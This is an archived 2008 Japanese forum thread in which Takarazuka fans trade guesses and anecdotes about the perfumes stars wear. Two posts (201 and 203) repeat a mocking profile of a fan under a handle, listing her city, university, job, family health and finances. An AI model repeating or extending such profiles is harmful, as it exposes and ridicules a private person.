188 :名無しさん@花束いっぱい。:2008/03/13(木) 04:40:38 ID:M1lD/5vV
サンポールみたいな臭いになるよね酸化するとw

189 :名無しさん@花束いっぱい。:2008/03/16(日) 13:47:19 ID:TvbnkBPB
    人                 
  (__)  さんぽーる♪   
\(__)/  さんぽーる♪
 (真∀飛)ヽ(●▽●)ノ




って、ここ何のスレ???

190 :名無しさん@花束いっぱい。:2008/03/17(月) 01:24:58 ID:lgPc6q1O
★ジェンヌさんの愛用香水★

191 :名無しさん@花束いっぱい。:2008/03/22(土) 12:42:02 ID:KDE7XYS/
>189
あれ、こんなとこにまでw

192 :名無しさん@花束いっぱい。:2008/03/25(火) 16:49:40 ID:v4fTuMWZ
ww

193 :名無しさん@花束いっぱい。:2008/03/26(水) 02:33:48 ID:XEhZ/I64
りさもあおいも臭いないからコロンの必要ないねん。りさはベビちゃんの香り。あおいは天然薔薇の香りがする。 (^-^)♪

194 :名無しさん@花束いっぱい。:2008/03/26(水) 13:15:27 ID:NbWYkTbB
臭いから香水つけるって発想の人なんているのか
元々臭い隠しでつけてた話は引き合いに出すなよ?

195 :名無しさん@花束いっぱい。:2008/04/04(金) 03:37:12 ID:gBzGH0+T
ジェンヌさんって誰?

196 :名無しさん@花束いっぱい。:2008/04/07(月) 04:11:58 ID:+uSRjZ2A
振り向いてごらん

197 :名無しさん@花束いっぱい。:2008/04/11(金) 14:50:18 ID:OIjBFUQj


198 :名無しさん@花束いっぱい。:2008/04/12(土) 12:44:47 ID:hZz4AqHl


199 :名無しさん@花束いっぱい。:2008/04/13(日) 07:00:03 ID:PXusPFAc


200 :名無しさん@花束いっぱい。:2008/04/13(日) 12:05:21 ID:AQVG2yCi
200

201 :麻子タンの薫りは?:2008/04/13(日) 23:10:21 ID:w/nPsAG0
墾田永年(別名キトリ・妄想サイトの店長)のスペック
・福岡在住
・福岡女学院大生
・英語でミュージカルをしてますっ♪
・親と同居
・母親が更年期障害
・お金が無い(なけなしのお金で地元の博多座や福岡市民会館に行く)
・福岡市内のホテルでバイト
・大劇場と東宝には殆ど行った事が無い(三階席が無いのを知らない)
・金持ちコンプレックス
・家柄コンプレックス
・宝塚不合格歴あり(心に深い傷を負う)
・虚栄心が非常に強い(貧乏をからかわれるとムキになり見栄を張る)
・虚言癖(親戚OGが興信所に行ってジェンヌの調査を依頼している、現役月組生と知り合い)
・麻子様似
・ときおりあやね似
・好きなカップリング・・麻子様受マンセー
・気分転換はバイトの合間に妄想サイトの晒し活動
・タンタンやタイガー◆の人気が妬ましい
・麻子様のリアル彼女を年上糞女と呼び夜な夜な藁人形に呪いを籠めて釘を打つ日々
・餌を与えないで下さい
つ自演乙

202 :名無しさん@花束いっぱい。:2008/04/14(月) 06:03:59 ID:z8SyCwa6


203 :名無しさん@花束いっぱい。:2008/04/15(火) 11:50:29 ID:euxdcHyX
墾田永年(別名キトリ・妄想サイトの店長)のスペック
・福岡在住
・福岡女学院大生
・英語でミュージカルをしてますっ♪
・親と同居
・母親が更年期障害
・お金が無い(なけなしのお金で地元の博多座や福岡市民会館に行く)
・福岡市内のホテルでバイト
・大劇場と東宝には殆ど行った事が無い(三階席が無いのを知らない)
・金持ちコンプレックス
・家柄コンプレックス
・宝塚不合格歴あり(心に深い傷を負う)
・虚栄心が非常に強い(貧乏をからかわれるとムキになり見栄を張る)
・虚言癖(親戚OGが興信所に行ってジェンヌの調査を依頼している、現役月組生と知り合い)
・麻子様似
・ときおりあやね似
・好きなカップリング・・麻子様受マンセー
・気分転換はバイトの合間に妄想サイトの晒し活動
・タンタン、タイガー◆の人気が妬ましい
・麻子様のリアル彼女を年上糞女と呼び夜な夜な藁人形に呪いを籠めて釘を打つ日々
・餌を与えないで下さい
つ自演乙


204 :名無しさん@花束いっぱい。:2008/04/18(金) 17:47:23 ID:Ya2e5H6Y
移転してたんだ‥

205 :名無しさん@花束いっぱい。:2008/04/20(日) 22:47:18 ID:tDeZ6GAs
OGで申し訳ないのですが、当時和央ようかさんの付けていた香水は何でしょうか?

206 :名無しさん@花束いっぱい。:2008/04/21(月) 00:50:22 ID:oS+sJk6o
いい匂いがした人っている?

207 :名無しさん@花束いっぱい。:2008/04/22(火) 11:00:21 ID:JQM2Lgvc
age

208 :名無しさん@花束いっぱい。:2008/04/26(土) 14:27:27 ID:7DNDh0sW
 

209 :名無しさん@花束いっぱい。:2008/05/01(木) 11:19:45 ID:SYuJDmL0
情報ないですか?

210 :名無しさん@花束いっぱい。:2008/05/01(木) 18:26:31 ID:74ikrhIS
ないですね‥

211 :名無しさん@花束いっぱい。:2008/05/01(木) 20:12:03 ID:SYuJDmL0
入りとかで分からんかね〜

212 :名無しさん@花束いっぱい。:2008/05/06(火) 11:20:42 ID:lpMTlq0M
水さんは閣下時代にモンブランつけてた/雑誌

213 :名無しさん@花束いっぱい。:2008/05/06(火) 11:26:47 ID:0lXTnSsl
女帝さまは エ●メスの
ナイルの何とか?
つけてた?

214 :名無しさん@花束いっぱい。:2008/05/07(水) 04:06:00 ID:DFGD91C9
庭?

215 :名無しさん@花束いっぱい。:2008/05/11(日) 07:19:04 ID:E0WoWged
つけてた?

216 :名無しさん@花束いっぱい。:2008/05/11(日) 15:44:32 ID:yrv1fpzC
きりやんは何使ってますか?

217 :名無しさん@花束いっぱい。:2008/05/12(月) 02:13:06 ID:QDdgTX3j
宝塚スター香水リスト
ttp://www.rakuten.ne.jp/gold/fragrance/yuumeijin/yuumeijin_takarazuka.htm
真偽の程は不明

218 :名無しさん@花束いっぱい。:2008/05/13(火) 20:42:19 ID:JuHDWS7+
月船さやかって誰やねん…

219 :名無しさん@花束いっぱい。:2008/05/19(月) 10:07:13 ID:ByBFgYSy
さららん?

220 :名無しさん@花束いっぱい。:2008/05/19(月) 11:33:52 ID:X+SXSoLj
大地真央がトップの頃の月組では
タイガーバームの匂いが流行ってた。
発信源はもちろん魔王様。

221 :名無しさん@花束いっぱい。:2008/05/25(日) 11:58:56 ID:IoTcrcAa
真央さんって今でもタイガーバームの匂いが一番落ち着いて癒されるって言ってるよね。
さすがに人前では付けてないらしいけど..

222 :名無しさん@花束いっぱい。:2008/05/25(日) 17:39:09 ID:XNmoc7Xh
タイガーバームを目の近くに塗って大騒ぎしてる男子いたなぁ

223 :名無しさん@花束いっぱい。:2008/05/25(日) 18:08:02 ID:RmJ/Cg+m
うちのおばあちゃんが頭痛の時こめかみに塗ってる
>タイガーバーム

224 :名無しさん@花束いっぱい。:2008/05/27(火) 06:59:55 ID:jJUfPWvN
真央さんは確かパコラバンヌをご愛用だった。
でも、オフでタイガーバームを塗りたくっていたのは有名。

225 :名無しさん@花束いっぱい。:2008/05/27(火) 21:18:16 ID:T2F7tEfu
オネエMANズで化粧品映ってたけど香水チェックするの忘れたー
ちゃっかりステファニーは出してたけど

226 :名無しさん@花束いっぱい。:2008/05/28(水) 23:16:57 ID:sa43gPB/
真央さんはタイガーバームを香水として使っていたのではなく肩こり解消のクリームとして使っていた。

227 :名無しさん@花束いっぱい。:2008/05/29(木) 02:42:25 ID:dkyukpg4
真央さんからタイガーバームの香りがしてきても気づかずに、
オリエンタルでミステリアスな香りだわ〜って思ってしまいそうw

228 :名無しさん@花束いっぱい。:2008/06/01(日) 04:01:49 ID:Vf7wYt/9
おねえまんず録画しとけはよかったな

229 :名無しさん@花束いっぱい。:2008/06/11(水) 08:55:21 ID:6LKwTnaN
情報マダー?

230 :名無しさん@花束いっぱい。:2008/06/15(日) 19:59:10 ID:ccAV+kMf
元でもいいんだ

231 :名無しさん@花束いっぱい。:2008/06/22(日) 06:19:10 ID:D4Y3BLNh
age

232 :名無しさん@花束いっぱい。:2008/06/29(日) 07:48:11 ID:UnFg2i9O
大和悠河ブルガリ ブラック

233 :名無しさん@花束いっぱい。:2008/06/30(月) 21:26:43 ID:4CrfKZT4
bu

234 :名無しさん@花束いっぱい。:2008/07/06(日) 21:26:23 ID:chcC17tf
紫吹淳ティファニー

235 :名無しさん@花束いっぱい。:2008/07/06(日) 22:14:38 ID:/bnIe9Nb
テルは?

236 :名無しさん@花束いっぱい。:2008/07/23(水) 07:18:05 ID:35muNdxU
わからない

237 :名無しさん@花束いっぱい。:2008/07/29(火) 15:15:51 ID:YWjuI+7F
 

238 :名無しさん@花束いっぱい。:2008/08/06(水) 03:00:50 ID:/0FbanEq
 

239 :名無しさん@花束いっぱい。:2008/08/11(月) 07:58:28 ID:wNdZhHuG
新情報が全くない‥

240 :名無しさん@花束いっぱい。:2008/08/24(日) 20:09:11 ID:z9D+vmaQ ?2BP(0)
朝比奈慶(花組) サバンナ

241 :名無しさん@花束いっぱい。:2008/09/02(火) 08:42:59 ID:ABCXlLR5
 

242 :名無しさん@花束いっぱい。:2008/09/08(月) 11:48:55 ID:T/gh7GTU
情報を‥

35 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)